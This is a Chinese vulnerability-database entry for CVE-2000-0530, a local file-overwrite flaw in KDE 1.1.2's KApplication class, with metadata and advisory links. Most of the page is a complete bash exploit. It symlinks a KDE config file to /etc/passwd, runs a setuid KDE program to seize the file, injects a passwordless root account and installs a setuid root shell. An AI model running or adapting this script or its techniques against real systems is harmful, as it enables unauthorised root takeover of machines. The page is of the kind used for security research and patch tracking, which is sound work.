KDE 1.1.2 Kapplication任意文件覆盖漏洞

KDE 1.1.2 Kapplication任意文件覆盖漏洞

漏洞ID 1105860 漏洞类型 未知
发布时间 2000-05-31 更新时间 2005-05-02
图片[1]-KDE 1.1.2 Kapplication任意文件覆盖漏洞-安全小百科CVE编号 CVE-2000-0530
图片[2]-KDE 1.1.2 Kapplication任意文件覆盖漏洞-安全小百科CNNVD-ID CNNVD-200005-110
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19981
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-110
|漏洞详情
KDE1.1.2版本的配置文件管理功能中KApplication类允许本地用户覆盖任意文件。
|漏洞EXP
#source: http://www.securityfocus.com/bid/1291/info
#  
#The KDE configuration-file management has a bug which could result in root compromise.
#  
#Due to insecure creation of configuration (rc) files via KApplication-class, local users can modify ownership of arbitrary files when running setuid root KDE-programs.
#  
#Properly exploited, this can permit a local attacker to change ownership of key system files, then write arbitrary data to them, allowing an elevation of privileges.


#!/bin/bash

link=/home/paul/.kde/share/config
linkto=/etc/passwd
target=/opt/kde/bin/ktvision

echo ""
echo "KTVision <= 0.1.1-271 local r00t exploit by IhaQueR"
echo ""

if ! test -u $target ; then
        echo "[-] $target not found"
        exit 1
fi;

echo "[+] $target found"

rm -f sush*
cat <<__DUPA__>>sush.c
#include <stdio.h>
main()
{
        setuid(geteuid());
        setgid(getegid());
        execl("/bin/bash", "/bin/bash", NULL);
}
__DUPA__

echo "    compiling sush"
res=$(gcc sush.c -o sush)

if test "$res" != "" -o ! -x sush ; then
        echo "[-] failed"
        rm sush* ktvback.*
        exit 2;
fi;

echo "[+] success"

cp $linkto ktvback.$$
mkdir -p $link
rm -f $link/ktvisionrc
ln -s $linkto $link/ktvisionrc

echo ""
echo -n "now running... (ensure that X is up and running)"

$target >/dev/null 2>&1 &
cpid=$!

declare -i cnt
declare -i max
cnt=0
max=60

while ! test -O $linkto ; do
        sleep 1;
        printf "  %.2d" $cnt
        cnt=$(($cnt+1))
        if test $cnt -ge $max ; then
                echo ""
                echo ""
                echo "[-] FAILED"
                rm sush* ktvback.*
                exit 2;
        fi;
done;

kill -9 $cpid >/dev/null 2>&1
rm $link/ktvisionrc

echo ""
echo ""
echo "[+] SUCCESS, creating sush"
echo >>$linkto "r00t::0:0:root:/root:/bin/bash"
echo ""
su r00t -c "chown 0.0 sush; chmod u+s sush; chmod g+s sush; cp
ktvback.$$ $linkto; chown 0.0 $linkto"
rm ktvback.* sush.c

if ! test -u sush ; then
        echo "    hm strange error"
        rm sush* ktvback.*
        exit 1
fi;

echo ""
echo "starting ./sush"
./sush

#!plonk
|参考资料

来源:XF
名称:kde-configuration-file-creation
链接:http://xforce.iss.net/static/4583.php
来源:BID
名称:1291
链接:http://www.securityfocus.com/bid/1291
来源:BUGTRAQ
名称:20000531KDE::KApplicationfeature?
链接:http://archives.neohapsis.com/archives/bugtraq/2000-05/0387.html
来源:REDHAT
名称:RHSA-2000:032
链接:http://www.redhat.com/support/errata/RHSA-2000-032.html
来源:CALDERA
名称:CSSA-2000-015.0
链接:ftp://ftp.calderasystems.com/pub/OpenLinux/security/CSSA-2000-015.0.txt

相关推荐: Unix CVE-1999-0559 Remote Security Vulnerability

Unix CVE-1999-0559 Remote Security Vulnerability 漏洞ID 1208793 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 1999-01-01 更新时间 1…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享